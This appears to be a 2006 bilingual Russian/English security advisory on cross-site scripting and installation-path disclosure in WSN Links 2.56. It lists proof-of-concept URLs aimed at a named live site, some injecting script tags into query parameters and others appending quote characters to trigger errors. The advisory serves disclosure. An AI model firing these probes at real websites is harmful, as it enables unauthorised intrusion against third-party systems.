XSS in WSN Links 2.56

2006-04-26T00:00:00
ID SECURITYVULNS:DOC:12423
Type securityvulns
Reporter Securityvulns
Modified 2006-04-26T00:00:00

Description

WSN Links 2.56

Home Page: http://scripts.webmastersite.net/wsnlinks/

Уязвимость/Vulnerability: Межсайтовый скриптинг/Cross Site Scripting

http://links.allmoney.ws/memberlist.php?field=&ascdesc=&page=3&perpage=14"><script>alert()</script><" http://links.allmoney.ws/memberlist.php?field=time&ascdesc=asc"><script>alert()</script><"&perpage=10

При регистрации пользователя, нет фильтрации полей личной информации.

Уязвимость/Vulnerability: Раскрытие установочного пути/Exposure of installation path:

http://links.allmoney.ws/memberlist.php?field=&ascdesc=&page=3'&perpage=14 http://links.allmoney.ws/memberlist.php?action=profile&id=52' http://links.allmoney.ws/link.php?id=100' http://links.allmoney.ws/report.php?id=61' http://links.allmoney.ws/email.php?id=61' http://links.allmoney.ws/vote.php?id=61' http://links.allmoney.ws/edit.php?action=comment&field=id&condition=equals&fieldvalue=3' http://links.allmoney.ws/reportcomment.php?id=3' http://links.allmoney.ws/search.php?filled=1&condition==&whichtype=links&searchfields[0]=ownerid&search=57'


Cyber Lords Team www.cyberlords.net